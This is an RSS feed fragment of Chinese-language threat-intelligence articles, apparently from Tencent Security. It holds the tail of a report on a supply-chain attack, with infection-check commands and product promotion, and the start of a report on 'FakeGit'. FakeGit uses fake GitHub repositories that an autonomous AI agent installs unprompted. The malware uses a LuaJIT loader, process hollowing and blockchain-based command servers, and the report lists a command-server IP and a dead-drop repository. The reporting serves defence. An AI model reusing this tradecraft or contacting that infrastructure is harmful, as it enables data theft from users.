leaf=""># 检查恶意频率控制文件</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">cat</span></span><span leaf=""> ~/init.json</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 检查 macOS 的恶意外挂服务</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">ls</span></span><span leaf=""> ~/Library/LaunchAgents/com.user.nodestart.plist</span></p></code></pre></div><p data-line="348" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><em style="font-style: italic;font-size: inherit;"><span leaf="">(一旦中招或使用过 Ledger/Trezor 桌面端，请立刻断网、重新在官网验证签名下载应用，并吊销重置所有的 GitHub/NPM Token 及云凭证。)</span></em></p><h2 data-line="350" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">8. 结语：氛围编程时代，信任是最贵的漏洞</span></h2><p data-line="351" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">本次行动的可怕之处，不在于其恶意代码有多么精妙和难以检测。其真正的杀伤力，在于它精准捕获了 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Vibe Coding 时代的脆弱性</span></strong><span leaf="">。</span></p><p data-line="353" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">AI 编程工具极大地降低了代码编写的门槛，也同时降低了安全审查的心理防线。开发者越来越倾向于“信任”AI，而 AI 又默认“信任”了那些看似官方的 GitHub 仓库。在这条不断延长的信任链条中，攻击者只需在一端轻轻注入一滴毒液，污染就会借由便利的工具，瞬间流传至成百上千台主机的血管中。</span></p><p data-line="355" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">供应链攻击的根本土壤，是“信任的传递性”——</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">你信任的人的仓库，可能已经不再属于他。</span></strong></p><p data-line="357" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在这个“回车即运行”、AI 替你接管一切的时代，当你敲下 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip install</span></code><span leaf=""> 或者按下 Claude 的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Accept</span></code><span leaf=""> 按钮时，请记住： </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">你引入的不仅是一段代码，更是整条信任链上所有开发者的安全底线。而在氛围编程时代，盲目的信任，就是最昂贵的零日漏洞。</span></strong></p><p data-line="360" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对OpenClaw安全风险，腾讯推出多场景安全防护矩阵：</span></strong></p><p data-line="362" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本地个人：</span></strong></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="363" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span style="font-style: normal;"><span leaf=""><span textstyle="" style="font-weight: bold;">腾讯电脑管家 </span>18.0 版本提供「龙虾管家-AI安全沙箱」，无需复杂配置、一键即可为 “龙虾” 开启隔离运行环境，并通过AI实时运行保护和漏洞防护，实现 “龙虾” 的全流程防护。</span></span></p></blockquote><p data-line="365" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本地企业：</span></strong></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="366" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span style="font-style: normal;"><span leaf=""><span textstyle="" style="font-weight: bold;">腾讯iOA</span>提供 “威胁源头——执行过程——数据出口” 全链路龙虾防护</span></span></p></blockquote><p data-line="368" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">云端部署</span></strong><span leaf="">：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="369" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span style="font-style: normal;"><span leaf=""><span textstyle="" style="font-weight: bold;">Lighthouse原生安全</span> Lighthouse与腾讯云ClawPro自带云端物理防爆箱：环境隔离、最小化端口放行、一键快照回滚</span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-weight: bold;">AI Agent安全中心</span> 盘点AI Agent资产，管控Agent行为，防范skills风险，保护密钥凭据，深度审计和全链路溯源</span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-weight: bold;">AI Agent安全网关</span> AI Agent身份凭据安全，防提示词注入，内容安全，数据防泄露，Token限流</span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-weight: bold;">Agent Runtime</span> 提供VM级强隔离、网络隔离、文件隔离、零凭证访问等能力，支持数十万实例并发</span></span></p></blockquote><p data-line="373" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Skills安全</span></strong><span leaf="">：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="374" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span style="font-style: normal;"><span leaf=""><span textstyle="" style="font-weight: bold;">EdgeOne ClawScan</span> 一句话即可让龙虾自己安装，自动 “体检” 并输出报告 </span></span></p><p data-line="374" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span style="font-style: normal;"><span style="font-style: normal;"><span leaf=""><span textstyle="" style="font-weight: bold;">HaS Anonymizer</span> 隐私保护，支持文本 / 图片信息扫描、脱敏和还原 </span></span></span></p><p data-line="374" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span style="font-style: normal;"><span style="font-style: normal;"><span style="font-style: normal;"><span leaf=""><span textstyle="" style="font-weight: bold;">威胁情报中心</span> Skills安全检测，构建覆盖互联网威胁发现与未知样本检测的全方面防护能力</span></span></span></span></p></blockquote></div><p style="text-align: center;margin-top: 0px;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-backh="1138" data-backw="578" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/jHUbrwW0VwXSDrAQ3X6hgsw21icuuHGxLUTLwndXSXq2kpRVD6ibxkiczLtDPcLgbMzDAibaicKCTeNDiaYokUAiaSVyLOKLtothElVXqC8942icfpA/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="578" data-cropsely2="1138" data-imgfileid="100027838" data-ratio="1.9685185185185186" data-s="300,640" style="width: 100%;height: auto !important;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=3d3f4197&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXSDrAQ3X6hgsw21icuuHGxLUTLwndXSXq2kpRVD6ibxkiczLtDPcLgbMzDAibaicKCTeNDiaYokUAiaSVyLOKLtothElVXqC8942icfpA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><p data-line="380" style="margin: 0px 8px 1.5em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p><h2 data-line="382" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">附录：参考链接</span></h2><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">StepSecurity</span></strong><span leaf="">: ForceMemo: Hundreds of GitHub Python Repos Compromised via Account Takeover and Force-Push (2026-03-14) </span></p><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf=""><a href="https://www.stepsecurity.io/blog/forcememo-hundreds-of-github-python-repos-compromised-via-account-takeover-and-force-push" target="_blank">https://www.stepsecurity.io/blog/forcememo-hundreds-of-github-python-repos-compromised-via-account-takeover-and-force-push</a></span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Aikido</span></strong><span leaf="">: GlassWorm Hides a RAT Inside a Malicious Chrome Extension (2026-03-18) </span></p><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf=""><a href="https://www.aikido.dev/blog/glassworm-chrome-extension-rat" target="_blank">https://www.aikido.dev/blog/glassworm-chrome-extension-rat</a></span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">BleepingComputer</span></strong><span leaf="">: GlassWorm malware hits 400+ code repos on GitHub, npm, VSCode, OpenVSX (2026-03-17) </span></p><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/glassworm-malware-hits-400-plus-code-repos-on-github-npm-vscode-openvsx/" target="_blank">https://www.bleepingcomputer.com/news/security/glassworm-malware-hits-400-plus-code-repos-on-github-npm-vscode-openvsx/</a></span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">SC World</span></strong><span leaf="">: GlassWorm campaign evolves: ForceMemo attack targets Python repositories via stolen GitHub tokens (2026-03-17) </span></p><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf=""><a href="https://www.scworld.com/brief/glassworm-campaign-evolves-forcememo-attack-targets-python-repositories-via-stolen-github-tokens" target="_blank">https://www.scworld.com/brief/glassworm-campaign-evolves-forcememo-attack-targets-python-repositories-via-stolen-github-tokens</a></span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AlphaHunt</span></strong><span leaf="">: [DEEP RESEARCH] How Malware Uses Solana and EVM Chains to Rotate C2 Without Burning Infrastructure (2026-03-19) </span></p><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf=""><a href="https://blog.alphahunt.io/deep-research-how-malware-uses-solana-and-evm-chains-to-rotate-c2-without-burning-infrastructure/" target="_blank">https://blog.alphahunt.io/deep-research-how-malware-uses-solana-and-evm-chains-to-rotate-c2-without-burning-infrastructure/</a></span></p></li></ul></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=84226035&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511496%26idx%3D1%26sn%3D62f573b1b87cbe92708cebbc20891236">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 25 Mar 2026 18:53:00 +0800</pubDate>
    </item>
    <item>
      <title>致命分身 | FakeGit 伪造开源生态投毒活动追踪</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511445&amp;idx=1&amp;sn=2f06e9a91eb303a5cf0f24dd103141a9</link>
      <description>FakeGit通过伪造AI、爬虫等GitHub仓库，利用LuaJIT加载恶意脚本，结合进程镂空与Polygon区块链C2通信，最终窃取敏感信息。</description>
      <content:encoded><![CDATA[<p>原创 <span>腾讯安全威胁情报</span> <span>2026-03-23 18:22</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=15d91e04&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwUqzHQ4icCNFnJpCL8hOy7ov30IQV9lwzn1HjibC4dk66rqZGvpOtrkiaBLq5B4V5ibXia0vaXYlgKBr3C8ZJb7qGXHmAYC5nmt7p28%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>FakeGit通过伪造AI、爬虫等GitHub仓库，利用LuaJIT加载恶意脚本，结合进程镂空与Polygon区块链C2通信，最终窃取敏感信息。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><p data-line="2" style="margin: 0px 8px 1.5em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">你打开 OpenClaw，对着小龙虾的对话框输入一行需求：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="4" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><em style="font-style: italic;font-size: inherit;"><span leaf="">&#34;帮我找一个能抓取某社交平台 APP 图文数据的工具，直接装好。&#34;</span></em></p></blockquote><p data-line="6" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这是 2026 年初，数以万计的AI爱好者每天都在做的事。这款爆火的开源 AI 智能体，让&#34;让 AI 替你干活&#34;从口号变成了现实——它不只是聊天，它会自己去 GitHub 搜索、评估、克隆、安装，全程无需人工介入。国内各大技术社区被&#34;龙虾&#34;刷屏，非技术圈的人也开始问&#34;你装了吗&#34;。</span></p><p data-line="8" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">几秒钟后，OpenClaw 返回了一个搜索结果：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">damiansilverado/xhs_one_spider</span></code><span leaf="">，README 完善，描述精准，Star 数看起来不错。它询问你是否确认安装。</span></p><p data-line="10" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">你点了确认。</span></p><p data-line="12" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Launch.cmd</span></code><span leaf=""> 静默启动。</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf=""> 加载 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf="">。你的屏幕截图和浏览器隐私信息，正在悄悄飞往境外的一台服务器。</span></p><p data-line="14" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">你对背后发生的事情一无所知。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><p data-line="18" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯安全科恩实验室威胁情报团队最新发现的 FakeGit 攻击事件，揭示了攻击者为 AI Agent 时代量身定制的猎杀逻辑：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">攻击者不再需要诱导你点击链接，只需要让你的 AI 助手替你完成这一切。</span></strong><span leaf=""> 恶意逻辑寄生在合法的 LuaJIT 解释器中，集结了高强度自定义 VM 混淆、无文件 PE 镂空（Process Hollowing）以及基于 Polygon 主网的区块链 C2 隐藏技术（EtherHiding）。而这，只是攻击者在 GitHub 上精心布局的 5 个同构仓库矩阵中的一个节点。</span></p><p data-line="20" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者精准捕捉到了时代的阵痛：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AI 与 SaaS 全链路开发的集成焦虑。</span></strong><span leaf=""> 随着国产大模型与 AIGC 产业的爆发，开发者对高质量语料、大模型接入工具、AI Agent 框架以及自动化运维组件的渴求已近乎狂热。这种急于将 AI 能力集成到产品中、抢占技术红利的迫切心态，我们称之为“集成焦虑”——它直接催生了一片安全防御的真空地带：当一个看似专业的开源工具出现在搜索结果前列时，极少有人会去审视其代码深处的阴影。</span></p><p data-line="22" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">而 OpenClaw 的爆火，将这一趋势推向了新的临界点：当 AI Agent 被授权自主搜索、安装、执行 GitHub 上的工具时，人工审计这道最后的防线，已经从流程中彻底消失。FakeGit 矩阵的设计者，显然预见到了这一天。本文将深度复盘这场数字围猎，拆解其背后的硬核攻防博弈。</span></p><h2 data-line="24" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">一、 顺藤摸瓜：FakeGit 虚假开源矩阵的深度挖掘</span></h2><p data-line="26" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">调查的起点源于我们在失陷机器发现的一个极其平庸的“诱饵”：一个名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">one-xhs-spider-v1.7.zip</span></code><span leaf=""> 的压缩包，托管在 GitHub 账号 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">damiansilverado</span></code><span leaf=""> 的仓库 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">xhs_one_spider</span></code><span leaf=""> 中，声称能绕过某社交平台 APP 的图文抓取限制。</span></p><h3 data-line="28" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">1. 诱饵暴露：隐秘的截图外传</span></h3><p data-line="30" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">解压后，压缩包内只有三个文件：一个名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf=""> 的“编译器”、一个名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code><span leaf=""> 的“配置文件”，以及一个 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Launch.cmd</span></code><span leaf=""> 启动脚本。表面上，这是一个再正常不过的工具包——</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gcc.exe</span></code><span leaf=""> 甚至能通过大多数杀毒软件的签名校验，因为它本就是一个合法的 LuaJIT 解释器。</span></p><p data-line="32" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当我们解开其伪装时，首先捕捉到的是其背后跳动的 C2 脉搏。通过对流量的初步分析，我们定位到了一个位于德国的 IP 地址 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">213.176.73.162</span></code><span leaf="">。在这里，受害者的屏幕截图被源源不断地以 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">multipart/form-data</span></code><span leaf=""> 格式上传至端点 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/api/NTE3YjdjNWU1NjYzNjU2YTA1N2Y=</span></code><span leaf="">。这种定时心跳机制预示着这绝非业余黑客的随手之作，而是一场精密工业化活动的冰山一角。</span></p><h3 data-line="34" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">2. 载荷追踪：寄生在 GitHub 上的加密中转站</span></h3><p data-line="36" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">顺着 C2 的网络回连请求，我们发现这个端点并非只是一个“截图收件箱”——它同时承担着下发指令的职责。在分析 C2 的响应内容时，我们截获了一段关键的 Lua 热补丁代码。为了躲避防火墙的域名黑名单，攻击者并未直接下载后续载荷，而是利用了 GitHub 官方域名的信任背书。</span></p><p data-line="38" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过逆向分析，我们锁定了其载荷中转仓库（Dead Drop）：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">github.com/mahmudul-riad/www</span></code></strong><span leaf="">。在这个名为“index”的目录下，隐藏着数个加密的文本文件。其中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">7.txt</span></code><span leaf=""> 是混淆的 Lua 脚本，而 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">8.txt</span></code><span leaf=""> 则封装了最终的木马真身。利用 GitHub 作为托管载荷的基础设施，攻击者成功实现了“寄生式分发”——只要 GitHub 在，投毒链就永远存活。</span></p><h3 data-line="40" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">3. &#34;FakeGit&#34; 矩阵：工业化伪造下的开源生态</span></h3><p data-line="42" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这不只是一个独立的爬虫投毒。通过进一步的情报交叉比对，一个代号为 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">&#34;FakeGit&#34;</span></strong><span leaf=""> 的庞大活动浮出水面。我们发现，这组攻击者通过自动化工具在 GitHub 上批量注册了大量看似毫无关联的账号，并发布了一系列针对性极强的开源仓库矩阵。</span></p><p data-line="44" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">每一个仓库都精准踩中了当下的技术热点，如同一张编制严密的捕鱼网：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对数据采集</span></strong><span leaf="">：伪装成某社交平台 APP 爬虫工具的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">xhs_one_spider</span></code><span leaf="">（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">one-xhs-spider-v1.7</span></code><span leaf="">）；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: 